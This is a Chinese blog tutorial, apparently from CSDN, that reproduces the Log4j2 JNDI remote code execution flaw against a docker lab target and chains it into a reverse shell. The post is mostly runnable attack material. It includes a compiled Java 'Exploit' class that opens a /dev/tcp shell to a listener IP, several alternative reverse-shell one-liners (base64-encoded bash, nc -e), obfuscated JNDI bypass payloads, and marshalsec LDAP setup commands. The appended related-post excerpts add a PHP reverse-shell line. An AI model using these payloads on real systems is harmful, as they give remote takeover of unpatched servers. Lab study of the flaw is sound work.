log4j 2 远程代码执行漏洞原理与搭建反弹shell

已于 2022-09-04 09:22:30 修改
阅读量2.3k 收藏 1
点赞数
文章标签: log4j web安全 系统安全 安全性测试 安全
于 2022-09-03 13:27:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flyingwind2000/article/details/126675523
版权
本文详细阐述了Log4j2漏洞原理,指导初学者如何搭建靶机环境,通过JNDI服务器转发恶意命令并利用JAVA病毒下载执行。重点介绍了搭建反弹服务器的过程,包括JNDI服务器配置、JAVA病毒编写和下载服务器部署。最后提供POSTMAN测试步骤,确保漏洞利用成功。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

log4j2漏洞出来有一段时间了, 该修复的都修复的差不多了, 是时候可以公开让大家了解下原理以及如何构建整套体系了.
本文虽然是靶机, 但原理上还是可以攻击其它漏洞机器的. 建议测试即可, 不然你就很刑了,这无狱无囚的日子是越来越有判头了 ^_^). 本文阅读者功底为初入门级安全人员, LINUX基础完备, 具备简单java开发技能最好, 但本漏洞复现只需代码略看得懂即可 ,python 会使用,普通工具会使用.

# 简单原理:

1. 受害人机器(靶机)上执行一条命令
2. 该命令被转发到你搭建的服务器
3. 你建立的服务器包括两个功能, 一个是接收这条受害指令, 二个跑到其它地方下载病毒(也是你可控制)
4. 你服务器自动把病毒上传到受害人机器, 受害人自动就执行了这条病毒
5. 这病毒是个一个反弹SHELL, 于是你完全接管了受害人(靶机)这台机器

# 总体思路:

完成实现上面的思路
1. 建立一台测试机, 用docker下载一个镜像, 该镜像是一个WEB网站, 收到你发送的登录信息就会打印log,恰好这是个漏洞, 你传了一条特意构造的语句, 它就会访问你的服务器A. 建好后, 使用postman 工具 发送POST指令模拟登录信息
2. 你的服务器A搭建两个服务, 一个服务是中间件JNDI服务器, 另一个服务是下载病毒python服务
3. 写一个简单的JAVA文件, 编译成class, 放到病毒服务器的下载目录 
4. 上面部分已经完全够用, 如你写的JAVA文件是个touch /tmp/frank . 或者是打开个计算器calc,它就已经是会被执行
5. 本文还想更进一步. 让它反弹到你的其它服务器, 就需要搭建一台服务器来接受反弹
6. 反弹成功后就可以完全控制受害人机器(靶机)

#  简单服务器说明:
1. 反弹机器 kali : 192.168.0.31
2. 控制机器 centos : 192.168.0.34
3. centos 目录: /home/frank/log4j/

# 实现方式

## 1. 下载一个有漏洞的docker 镜像
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8100:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j_vuln_container /bin/bash
进去后下载点工具, 万一运行不起来还能看下原因
yum install net-tools -y
yum install tree -y
yum install telnet -y
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh 

如果有问题可以尝试关了再开
/bin/bash /home/apache-tomcat-8.5.45/bin/shutdown.sh

## 2. 搭建一台接收服务器
### 2.1 搭建JNDI服务器
(这个工具可不仅是JNDI这么简单, 还有很强的功能, 但为了不让大家头大, 就当它是JNDI工具即可)

下载 地址: https://codeload.github.com/RandomRobbieBF/marshalsec-jar/zip/refs/heads/master
下载成功后是一个ZIP包. marshalsec-jar-master.zip, 里面包含marshalsec-0.0.3-SNAPSHOT-all.jar 
上传到centos /home/frank/log4j/ 目录下, 运行
cd /home/frank/log4j/
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.0.34:7777/#Exploit 8888

如果直接可以用就恭喜你.

 但是.... but....

如果机器不同, 不能用. 就只能直接去下载源码编译, 这就更麻烦了. 要下载maven

下载页面:  GitHub - mbechler/marshalsec
JNDI下载地址 https://github.com/mbechler/marshalsec/archive/refs/heads/master.zip

https://github.com/mbechler/marshalsec/archive/refs/heads/master.zip

安装maven
yum install  java-1.8.0-openjdk -y
yum install java-1.8.0-openjdk-devel.x86_64 -y
yum install maven -y
添加MAVEN的阿里源
vi /etc/maven/settings.xml

  <mirror>
      <id>aliyunmaven</id>
      <mirrorOf>*</mirrorOf>
      <name>阿里云公共仓库</name>
      <url>https://maven.aliyun.com/repository/public</url>
    </mirror>

把marshalsec-master.zip 放到/home/frank/log4j/目录下

cd /home/frank/log4j/
unzip marshalsec-master.zip
cd marshalsec-master/
mvn clean package -DskipTests
成功会成生target/ 目录 
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.0.34:7777/#Exploit 8888

如下表示成功

### 2.2 写个JAVA病毒程序

cd /home/frank/log4j
vi Exploit.java
public class Exploit {
  public Exploit(){
    try{

    String[] commands = {"bash","-c","exec 5<>/dev/tcp/192.168.0.31/9999;cat <&5 | while read line; do $line 2>&5 >&5; done"};
      for (int i=0; i<commands.length;i++) {
          System.out.println(commands[i]);
      }

      System.out.println("======");

      Process pc = Runtime.getRuntime().exec(commands);
      pc.waitFor();
   } catch(Exception e){
      e.printStackTrace();
   }
 }
  public static void main(String[] argv) {
    Exploit e = new Exploit();
 }

}

编译

javac Exploit.java
得到 Exploit.class (成功,结束)
commands 里有自己各种变种, 就不教太多了, 这得自己去努力, 不能太便宜脚本小子去害人,  自己去查资料学习吧.

这里有坑, 尝试下面的一直不行. 但我在docker 里面用命令行测试多个都是100% 反弹成功的, 非常奇怪.  难道涉及逃逸? 一直没想通, 起码浪费了我一上午的调试时间, 网上搜索了很久, 才看到有个高手提醒, 不能这样用, 只能用上面的才能反弹,但没说原理

sh -i >& /dev/tcp/192.168.0.31/9999 0>&1
bash -c "{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4wLjMxLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"

另外也有绕过的资料以供参考
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

还有变种
nc 192.168.0.31 9999 -e /bin/sh
${jndi:ldap://192.168.0.31:8888/Basic/Command/Base64/bmMgMTkyLjE2OC4wLjMxIDk5OTkgLWUgL2Jpbi9zaA==}

 ### 2.3 搭建下载服务器
cd /home/frank/log4j
python3 -m http.server 7777

如下表示成功

###2.4 准备攻击! 使用POSTMAN测试
先看一下docker 是否正常

 POSTMAN 要使用POST 只需要设置地址http://192.168.0.34:8100/webstudy/hello-fengxuan, 参数为c , 参数为 ${jndi:ldap://192.168.0.34:8888/Exploit}

先测试下WEB服务是否正常,先用GET测试,以下为正常

 再用POST测试, 如下所示则证明WEB正常

动手!!!
参数改成 ${jndi:ldap://192.168.0.34:8888/Exploit}

 记住, 指向JNDI服务器就可以

如果有反弹则成功, 有的POSTMAN版本要URL编码, 则编码一次再SEND

 如果攻击成功,则立即收到2条消息 

 

--->  反弹成功!

在192.168.0.31 这台Kali机器收到消息

到此, 整个环境就搭建成功, 也测试通过了. 

以上的, 如果把靶机换成其它机器, 把你的服务器换成外网, 则完全是可以控制任何机器. 还好, 为了怕你干坏事, 不是所有机器都能成功.因为必须要求受害机上的版本比较低,自己去研究吧, 我看刑, 可狱不可囚,日子很有判头, 我会去看望你的.

我是小风, 感谢帮助过我的那些网络上的无名前辈与过客. 希望您也能无私帮助他人,别学我这么懒. :^-^) 

烈火小风
关注
Apache Log4j2 RCE漏洞利用反弹shell合集
总有人间一两风,填我十万八千梦
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
log4j2远程代码执行漏洞复现
qq_42194976的博客
07-12 1143
log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务(可能是攻击者部署好的恶意代码)。攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,造成了远程代码执行(可反弹shell到指定服务器)。
Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell
Hi~ 土拨鼠
12-16 5274
文章目录1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下 1、构造EXP import java.io.BufferedReader; import java.io.InputStream; i
Apache Log4j2漏洞复现
Adminxe的博客
12-23 1713
0x00 前言 作者:Moco 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01 漏洞描述 A..
vulhub/log4j2漏洞靶场----反弹shell
qq_65379983的博客
03-15 2281
log4j2 严重漏洞介绍和靶场练习
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞反弹shell
PolarPeak的博客
12-10 5392
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
Log4j2漏洞(二)3种方式复现反弹shell
02-08 2559
Log4j2漏洞(二)3种方式复现反弹shell,有对环境要求苛刻的、有步骤多的、也有简单易现的,复现时按需要选择,如果是学习我建议都学习下。
log4j2 远程代码执行漏洞复现(CVE-2021-44228)
2301_76631050的博客
08-01 1196
Apache Log4j:Apache的开源项目,一个功能强大的日志组件,提供方便的日志记录Apache Log4j2:对Log4j的升级,它比其前身Log4j1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Loqback架构中的一些问题。优秀的Java日志框架;Log4j2 漏洞受影响版本:2.0到2.14.1版本中存在一处JNDI注入漏洞
log4j2远程代码执行漏洞复现(CVE-2021-44228)
Wshchf的博客
06-04 820
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
核弹级“Apache Log4j2远程代码执行漏洞(CVE-2021-44228)”复现及原理
weixin_46263525的博客
04-05 1608
在java中最常用的日志框架是log4j2和,Apache Log4j2是一款使用非常广泛的Java日志框架。2021年12月9日,Apache Log4j2爆出存在远程代码执行漏洞,由于Apache Log4j2广泛地应用在各种Web程序中,该漏洞涉及用户量较大,危害性非常之高,漏洞影响版本为2.0~2.14.1。
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Log4j2 RCE漏洞及靶场搭建
weixin_51387754的博客
12-11 6258
漏洞简介 Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。 目前受影响的Apache Log4j2版本: 2.0 ≤ Apache Log4j <= 2.14.1 漏洞复现 在下载镜像复现之前确保,虚拟机非处于挂起状态! 在下载
log4j2漏洞反弹shell
最新发布
2301_78554096的博客
03-17 534
log4j2漏洞反弹shell
log4J2靶机搭建漏洞复现
qq_34415266的博客
01-16 5179
log4J2漏洞的靶机搭建和攻击复现详细过程
log4j2核弹级漏洞靶场复现(反弹shell
m0_56773673的博客
01-04 4264
十分钟log4j2靶场漏洞复现!!!
log4j反弹shell
qq_33834637的博客
04-25 4625
漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记录到日志时,攻击者通过构造特殊请求,来触发 Apache
Log4j2漏洞利用
weixin_52515588的博客
12-30 1098
升级到最新的安全版本:log4j2-2.15.0-rc2。选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。这里的命令是想要靶机运行的命令,-A 后放的是发出攻击的电脑的IP,也是存放-C后”命令”的IP地址。【我直接下载连接失败,就下载好了以后拉进来的,如果是直接下载的去对应目录下面找】在漏洞已存在的情况下,构造攻击payload执行命令反弹shell。监听界面出现反弹shell成功的界面:(进入了交互模式)实现反弹shell,可以使用命令。
log4j2漏洞模拟
qq_64470109的博客
03-17 438
log4j2是Apache的一个java日志框架,这个远程代码执行漏洞是由JNDI引起,JNDI其中有一个look up()方法,它可以远程加载对象,如果我们在我们的服务器上构造一个恶意对象让他来加载,它加载了恶意对象之后我们就可以控制它。
命令执行漏洞反弹shell
03-13
### 关于命令执行漏洞反弹Shell原理 当存在命令执行漏洞时,攻击者能够通过特定构造的输入来控制服务器端执行任意系统指令。对于反弹Shell而言,其核心在于利用该漏洞使受害主机主动向攻击者的机器发起连接并提供交互式的命令行环境。 #### 反弹Shell的工作机制 通常情况下,攻击者会构建一条特殊的命令字符串发送至目标应用程序中的易受攻击部分。这条命令不仅包含了建立反向外壳所需的操作序列,还可能携带有关源地址、目的地址以及监听端口的信息。一旦这些恶意载荷被成功注入并通过`shell_exec()`或其他类似的函数得以运行,则会在受害者计算机上启动一个新的进程,并将其标准输入/输出重定向到网络套接字上[^2]。 例如,在Linux环境下,可以通过下面这样的PHP代码片段实现简单的bash反弹: ```php <?php shell_exec('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'); ?> ``` 这段脚本会让受影响的服务程序调用bash解释器创建一个互动终端,并将此终端的标准流绑定到由IP和Port定义的一个TCP客户端连接之上。 ### 防护措施建议 为了有效防止此类攻击的发生,可以从以下几个方面着手加强系统的安全性: - **最小权限原则**:确保Web服务及其依赖组件仅拥有完成工作所必需最低限度的权利;避免以root或者管理员身份运行任何不必要的后台处理逻辑。 - **输入验证清理**:严格过滤所有来自外部世界的请求数据,特别是那些最终会被拼接到操作系统级API调用里的参数值。采用白名单方式限定允许接收的内容模式,拒绝一切不符合预期格式的东西进入内部流程中去。 - **禁用危险功能**:如果业务场景确实不需要动态解析或编译用户提交过来的语言结构体的话,那么应当考虑关闭像eval()这样潜在风险较高的特性开关。 - **定期更新补丁**:时刻关注官方发布的安全公告和技术文档,及时安装针对已知弱点修复过的版本包,减少暴露在外的风险敞口面积。 - **日志监控审计**:建立健全的日志记录体系,密切跟踪异常行为轨迹变化趋势,以便快速响应突发事件并追溯历史事件真相。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值